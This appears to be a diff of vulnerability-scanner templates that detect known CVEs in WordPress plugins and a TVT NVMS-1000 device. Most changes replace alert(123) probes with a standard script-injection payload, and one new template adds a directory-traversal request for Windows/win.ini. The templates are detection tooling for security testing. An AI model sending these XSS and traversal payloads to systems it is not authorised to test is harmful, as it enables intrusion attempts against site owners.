+  author: daffainfo
+  severity: medium
+  description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
+  tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2019-19134.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
+      - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - 'foo"><svg//onload="alert(123)">'
+          - 'foo"></script><script>alert(document.domain)</script>'
         part: body
 
       - type: word

CVE-2019-20085.yaml

@@ -0,0 +1,26 @@
+id: CVE-2019-20085
+
+info:
+  name: TVT NVMS 1000 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
+  reference: |
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20085
+    - https://www.exploit-db.com/exploits/48311
+  tags: cve,cve2019,iot,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "\\[(font|extension|file)s\\]"
+        part: body
+      - type: status
+        status:
+          - 200

CVE-2020-12054.yaml

@@ -18,7 +18,9 @@ requests:
       - type: word
         words:
           - "<img src=x onerror=alert(123);>"
+          - "catch-breadcrumb"
         part: body
+        condition: and
 
       - type: word
         part: header
@@ -27,4 +29,4 @@ requests:
 
       - type: status
         status:
-          - 200
+          - 200

CVE-2020-17362.yaml

@@ -11,13 +11,18 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
+      - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<img src onerror=alert(123)>"
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        words:
+          - "nova-lite"
         part: body
 
       - type: word

CVE-2021-24298.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
+      - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2021-24320.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
+      - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<img src=x onerror=(alert)(123);>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2021-24335.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
+      - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<img src=x onerror=alert(123);>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2021-24389.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
+      - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>prompt(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-church-admin-xss.yaml

@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
+      - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert('{{randstr}}')</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-custom-tables-xss.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-finder-xss.yaml

@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123);</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-flagem-xss.yaml

@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-knews-xss.yaml

@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
+      - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-nextgen-xss.yaml

@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-phpfreechat-xss.yaml

@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-slideshow-xss.yaml

@@ -10,16 +10,16 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-      - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+#     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
-      - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+#     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
-      - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+#     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123);</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

wp-socialfit-xss.yaml

@@ -13,13 +13,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '<script>alert(1)</script>'
+          - '</script><script>alert(document.domain)</script>'
       - type: word
         part: header
         words: